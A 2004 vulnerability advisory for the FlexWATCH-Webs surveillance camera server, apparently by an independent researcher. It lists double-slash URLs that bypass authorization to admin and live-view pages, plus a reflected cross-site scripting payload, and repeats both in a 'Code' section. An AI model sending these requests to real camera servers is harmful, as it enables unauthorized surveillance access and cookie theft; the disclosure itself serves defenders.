~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:  FlexWATCH-Webs
Vendors:        Seyeon TECH Co., Ltd.
                        http://www.flexwatch.com/
                        http://www.seyeon.co.kr
Versions:        <= 2.2 (NTSC)
Platforms:       Windows
Bug:                 Authorization Bypass
Risk:               Very High
Exploitation:   Remote with browser
Date:               26 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

FlexWATCH is used as for remote administration and for
security surveillance server. Security cameras servers should
not be accessible to anyone but the administrator.
Some of Las Vegas Casinos are using FlexWATCH(Tip for them)
as their security surveillance server, it is ridiculous that a company
invests money in a software to increase security and instead
reduces it. I can only imagine the risk for a casino which uses
this software.
FlexWATCH also contains an ftp server and the machine's
dial-up accounts and configuration, taking over the machine is
also possible.

FlexWATCH describe their product the following way:
------------------------------------------------------------------------
"FlexWATCH™ Network Camera and video server series are all stand-alone video
transmission system to deliver
crystal clear real time live video over the TCP/IP network. FlexWATCH™
System has a built-in web server that
enable you to view live video through standard web browser such as MSIE or
Netscape Navigator.
Once you connect the FlexWATCH™ System to the existing network such as LAN,
Cable modem, DSL and assign
IP address, you can view remote site from anywhere anytime through web
browser without any viewing software.

Various types of Network camera and Video servers are provided by Seyeon
technology to meet different customer needs.
For more information go to Network camera or Network video server page.

By combining with other supporting software and hardware, you can easily
build up various type of solution for remote
monitoring and security."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Authorization Bypass:
This case is a classic case of "Authorization Bypass" which is
caused by the use of double slash when reffering to files on the
server.

using each one of the following links will allow anyone full control
over the server:
http://<host>//app/idxam.html
http://<host>//app/idxas.html
http://<host>//app/idxasp.html
http://<host>//admin/aindex.htm
http://<host>//live.html

If an attacker will request the following url from the server:
http://<host>/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>
XSS appears and the server allows an attacker to inject & execute scripts.

This vulnerability can allow attackers to rewrite the contents of the
webpage by injecting scripts to it.
Imagine a client of one of nextplace.com clients coming to buy something and
his credit card and
personal details are being sent to the "hacker" instead of the company.
Why? because the "hacker" can spread links and popups of the websites with
the injected scripts,
maby even a new email worm sending evil links to all the world. In addition
users cookies
(that may contain the same important data) can be stolen, and creating such
evil links will effect forever,
because Internet Explorer vulnerabilities of the past and the future will be
a key to hurt the surfers.

In the words of securityfocus.com :
~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit
this issue
via a malicious link containing arbitrary HTML and script code as part of
the hostname.
When the malicious link is clicked by an unsuspecting user, the
attacker-supplied HTML
and script code will be executed by their web client. This will occur
because the server
will echo back the malicious hostname supplied in the client's request,
without sufficiently
escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web
content or to
steal cookie-based authentication credentials. It may be possible to take
arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authorization Bypass:
http://<host>//app/idxam.html
http://<host>//app/idxas.html
http://<host>//app/idxasp.html
http://<host>//admin/aindex.htm
http://<host>//live.html

Cross Site Scripting:
http://<host>/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."